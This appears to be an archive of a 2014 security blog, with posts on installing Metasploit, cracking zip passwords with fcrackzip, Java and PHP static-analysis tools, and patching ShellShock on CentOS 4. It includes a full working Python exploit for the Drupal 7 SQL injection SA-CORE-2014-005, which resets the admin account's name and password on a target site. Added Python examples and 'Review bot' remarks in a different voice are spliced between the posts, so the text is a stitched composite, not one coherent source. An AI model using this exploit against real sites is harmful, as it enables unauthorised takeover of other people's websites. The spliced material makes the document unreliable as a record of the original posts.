CVE Feeds

Oct 31, 2014

Howto: Install Metasploit (GIT) on Ubuntu 14.04.2

1. Update the package lists and upgrade your OS
# apt-get update && apt-get dist-upgrade -y

2. Download source code from git
# git clone https://github.com/rapid7/metasploit-framework

3. Install the required packages
# apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby ruby-dev

4. Install bundler
# gem install bundler

5. Install the required gems
# bundle install

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oct 30, 2014

Howto: Zip and crack zip file in Kali

1. Create zip file
# zip --password <your_password> filename.zip target_file

2. Crack zip file with fcrackzip
# fcrackzip -h

fcrackzip version 1.0, a fast/free zip password cracker
written by Marc Lehmann <pcg@goof.com> You can find more info on
http://www.goof.com/pcg/marc/

USAGE: fcrackzip
          [-b|--brute-force]            use brute force algorithm
          [-D|--dictionary]             use a dictionary
          [-B|--benchmark]              execute a small benchmark
          [-c|--charset characterset]   use characters from charset
          [-h|--help]                   show this message
          [--version]                   show the version of this program
          [-V|--validate]               sanity-check the algortihm
          [-v|--verbose]                be more verbose
          [-p|--init-password string]   use string as initial password/file
          [-l|--length min-max]         check password with length min to max
          [-u|--use-unzip]              use unzip to weed out wrong passwords
          [-m|--method num]             use method number "num" (see below)
          [-2|--modulo r/m]             only calculcate 1/m of the password
          file...                    the zipfiles to crack

methods compiled in (* = default):

 0: cpmask
 1: zip1
*2: zip2, USE_MULT_TAB

3. Crack it with
# fcrackzip -b -c 'a' -l 1-5 -u filename.zip

4. Done.
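
The command in step 3 tries every lowercase string of one to five characters. As an added example (not part of the post), the Python helper below expands fcrackzip's -c charset syntax and computes the worst-case number of candidates for a given -l range, which is the figure a defender needs to judge whether a zip password would survive this tool; the character classes are the ones listed in the fcrackzip man page, and the guess rate is an assumed parameter you would measure with -B on your own hardware.

```python
import string

# fcrackzip -c character classes as documented in its man page (the '!' set is
# reproduced from there); a ':' means every character after it is taken literally.
CHARSET_CLASSES = {
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
    "1": string.digits,
    "!": "!:$%&/()=?{[]}+*~#",
}

def expand_charset(spec):
    """Expand an fcrackzip -c spec such as 'aA1' or 'a:.-' into the characters it tries."""
    chars = []
    for i, c in enumerate(spec):
        if c == ":":
            chars.extend(spec[i + 1:])       # literal tail, e.g. 'a:.-' adds '.' and '-'
            break
        if c not in CHARSET_CLASSES:
            raise ValueError("unknown charset class %r" % c)
        chars.extend(CHARSET_CLASSES[c])
    return "".join(dict.fromkeys(chars))     # de-duplicate while keeping order

def keyspace(spec, min_len, max_len):
    """Candidates that 'fcrackzip -b -c SPEC -l MIN-MAX' tries in the worst case."""
    n = len(expand_charset(spec))
    return sum(n ** k for k in range(min_len, max_len + 1))

def worst_case_seconds(spec, min_len, max_len, candidates_per_second):
    """Upper bound on wall-clock time for the whole keyspace at an assumed guess rate."""
    return keyspace(spec, min_len, max_len) / float(candidates_per_second)

if __name__ == "__main__":
    # The post's '-c a -l 1-5' is about 12.4 million candidates; longer mixed
    # passwords grow the space by orders of magnitude per extra character.
    for spec, lo, hi in (("a", 1, 5), ("aA1", 1, 8), ("aA1!", 1, 12)):
        print("-c %-5s -l %d-%d: %d candidates" % (spec, lo, hi, keyspace(spec, lo, hi)))
```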

Oct 23, 2014

Video: BSides DC 2014

Source: https://www.youtube.com/playlist?list=PLWeT8XI0Y0X7MI_Q-nbG4JUKIGmvLhd3l

Oct 21, 2014

Tools: Findbugs + FindSecurityBugs - Java security static analysis tool

FindBugs

FindBugs is a program which uses static analysis to look for bugs in Java code. It is free software, distributed under the terms of the Lesser GNU Public License. The name FindBugs™ and the FindBugs logo are trademarked by The University of Maryland. FindBugs has been downloaded more than a million times.

Source: http://findbugs.sourceforge.net/

FindSecurityBugs
For those who don't know about it, FindSecurityBugs is a plugin for the Java static analysis tool FindBugs. This plugin consists of a set of rules that focus only on security weaknesses.

Source: http://blog.h3xstream.com/2014/10/find-security-bugs-new-version-and.html

Tools: RIPS (Static Source Code Analysis For PHP Vulnerabilities)

RIPS is a tool written in PHP to find vulnerabilities using static source code analysis for PHP web applications. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.  
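
To make the source/sink idea in that description concrete, here is an added toy version of the analysis in Python (not RIPS's own code): it tracks which variables carry user input through a constructed PHP fragment and reports a sink only when the input did not pass through a sanitizer valid for that sink's context; the source, sink and sanitizer lists are illustrative assumptions.

```python
import re
# Toy of the RIPS approach: user input (sources) flows via assignments into sensitive
# functions (sinks); a sink is reported unless every input had a sanitizer valid for it.
SOURCES = ("$_GET", "$_POST", "$_COOKIE", "$_REQUEST")
SINKS = {"mysql_query": "SQL injection", "echo": "XSS", "system": "command execution"}
SANITIZERS = {"mysql_query": {"mysql_real_escape_string", "intval"},
              "echo": {"htmlspecialchars", "intval"},
              "system": {"escapeshellarg", "intval"}}
ALL_SANITIZERS = set().union(*SANITIZERS.values())
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=\s*(.+?);\s*$")
VAR = re.compile(r"\$\w+")

def taint_of(expr, taint):
    """Sanitizers covering every tainted input of expr, or None if expr is clean."""
    inputs = [set()] if any(s in expr for s in SOURCES) else []
    inputs += [taint[v] for v in VAR.findall(expr) if v in taint]
    if not inputs:
        return None
    covered = set.intersection(*inputs)   # a sanitizer counts only if ALL inputs had it
    return covered | {f for f in ALL_SANITIZERS if f + "(" in expr}

def analyse(php_lines):
    """Return (line_no, sink, vulnerability) for each sink fed by unsanitized input."""
    taint, findings = {}, []
    for no, line in enumerate(php_lines, 1):
        for sink, vuln in SINKS.items():  # sinks first: a call may sit inside an assignment
            if re.search(r"\b%s\b" % sink, line):
                t = taint_of(line, taint)
                if t is not None and not t & SANITIZERS[sink]:
                    findings.append((no, sink, vuln))
        m = ASSIGN.match(line)
        if m:  # propagate (or clear) taint through the assignment
            var, expr = m.groups()
            t = taint_of(expr, taint)
            if t is None:
                taint.pop(var, None)
            else:
                taint[var] = t
    return findings

# Constructed PHP fragment (not from any real application); lines 5 and 7 are the bugs.
SAMPLE_PHP = """\
$id = $_GET['id'];
$safe_id = intval($id);
$name = htmlspecialchars($_POST['name']);
mysql_query("SELECT * FROM users WHERE id = $safe_id");
mysql_query("SELECT * FROM users WHERE name = '$name'");
echo "Hello " . $name;
system("ping " . $id);
""".splitlines()
```

Line 5 is flagged because htmlspecialchars() neutralises HTML but not SQL, which is exactly the context-sensitivity a real taint scanner has to encode.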

Source: http://rips-scanner.sourceforge.net/

Tools: OWASP OWTF(Offensive Web Testing Framework)

OWASP OWTF is a project that aims to make security assessments as efficient as possible by automating the manual, uncreative part of pen testing.

Source: https://owtf.github.io/

Oct 16, 2014

Ruxcon & Breakpoint - Material

https://ruxcon.org.au/slides/

https://ruxconbreakpoint.com/slides/

Tools: Drupal 7.x SQL Injection SA-CORE-2014-005

    #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
    #Creditz to https://www.reddit.com/user/fyukyuk
    import urllib2,sys
    from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
    # Check the argument count before sys.argv is indexed (argv[0] is the script
    # name, so three arguments means len(sys.argv) == 4) and stop if it is wrong.
    if len(sys.argv) != 4:
        print "host username password"
        print "http://nope.io admin wowsecure"
        sys.exit(1)
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = "name[0%20;update+users+set+name%3d\'" \
                +user \
                +"'+,+pass+%3d+'" \
                +hash[:55] \
                +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
    content = urllib2.urlopen(url=target, data=post_data).read()
    if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
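
From the defender's side, the request body in the script above is what an intrusion analyst would look for in web logs. The Python below is an added example (not from the post or from Drupal): it flags login form posts where name or pass is submitted with a non-numeric array key, the shape this injection relies on, and the two request bodies it scans are constructed, with the hash replaced by a placeholder.

```python
import re
from urllib.parse import parse_qsl

# Drupal 7's login form submits 'name' and 'pass' as plain strings. The script above
# instead submits name[...] with an attacker-chosen array key, which the unpatched
# query placeholder expansion copied into the SQL. A key that is not a plain
# integer index is therefore the signal, whatever SQL the key carries.
ARRAY_PARAM = re.compile(r"^(name|pass)\[(.*)\]$")
SQL_WORDS = re.compile(r"\b(update|insert|delete|select|union|drop)\b", re.IGNORECASE)

def malformed_login_keys(body):
    """Return the decoded form keys in a POST body that abuse array syntax on name/pass."""
    bad = []
    for key, _value in parse_qsl(body, keep_blank_values=True):
        m = ARRAY_PARAM.match(key)
        if m and not m.group(2).isdigit():
            bad.append(key)
    return bad

def classify(body):
    """'benign', 'suspicious' (array key abuse without SQL) or 'exploit' (key carries SQL)."""
    keys = malformed_login_keys(body)
    if not keys:
        return "benign"
    return "exploit" if any(SQL_WORDS.search(k) for k in keys) else "suspicious"

# Constructed request bodies (not captured traffic): a normal login and one shaped
# like the post's payload, with the password hash replaced by a placeholder.
BENIGN_BODY = "name=alice&pass=s3cret&form_build_id=&form_id=user_login_block&op=Log+in"
ATTACK_BODY = ("name[0%20;update+users+set+name%3d'admin',pass%3d'<HASH>'+where+uid%3d'1';;#%20%20]=bob"
               "&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in")

if __name__ == "__main__":
    for body in (BENIGN_BODY, ATTACK_BODY):
        print(classify(body), malformed_login_keys(body))
```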

Hack In The Box 2014 - Material

http://conference.hitb.org/hitbsecconf2014kul/materials/

Oct 15, 2014

Howto: Fix ShellShock in CentOS 4

First, follow the "Setup" procedure from http://bradthemad.org/tech/notes/patching_rpms.php.
Then run the following commands from your %_topdir:
wget http://ftp.redhat.com/redhat/linux/updates/enterprise/4ES/en/os/SRPMS/bash-3.0-27.el4.src.rpm
rpm -ivh bash-3.0-27.el4.src.rpm
cd SOURCES
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-017
cd ..
Patch SPECS/bash.spec with this diff:
4c4
< Release: 27%{?dist}
---
> Release: 27.2%{?dist}
28a29
> Patch17: bash30-017
110c111,112
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
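Review bot: the third hunk (110c111,112) does more than add %patch17: it also uncomments `%patch16 -p0 -b .016`, which the stock spec had commented out. Enabling a previously skipped patch changes the build beyond the ShellShock fix this post is after, so check the spec's changelog for why patch16 was disabled before turning it on; if it is not needed, the hunk should leave the commented line alone and only add `%patch17 -p0 -b .017` after it.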
Then finish with these commands:
rpmbuild -ba SPECS/bash.spec
sudo rpm -Uvh RPMS/i386/bash-3.0-27.2.i386.rpm
If someone knows an easy way to upload them, I'll put up my source and RPM.
Edit: The latest comments in the Red Hat Bugzilla say the patch is incomplete. The new ID is CVE-2014-7169.
Edit: There are two additional patches from gnu.org, so also download those into the same SOURCES directory:
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-018
wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-019
Then also edit the SPECS/bash.spec as follows ("Release" numbering optional):
4c4
< Release: 27%{?dist}
---
> Release: 27.2.019%{?dist}
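Review bot: this first hunk (4c4) still replaces `Release: 27%{?dist}`, so the diff is written against the unmodified spec, not against the spec already changed by the earlier diff (whose 4c4 hunk set that same line to 27.2). Apply it to a fresh copy of SPECS/bash.spec, otherwise the Release hunk is rejected; the "also edit" wording above should say that this diff replaces the first one rather than adding to it.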
28a29,31
> Patch17: bash30-017
> Patch18: bash30-018
> Patch19: bash30-019
110c113,116
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
> %patch18 -p0 -b .018
> %patch19 -p0 -b .019 
 
Source:  http://serverfault.com/questions/631055/how-do-i-patch-rhel-4-for-the-bash-vulnerabilities-in-cve-2014-6271-and-cve-2014
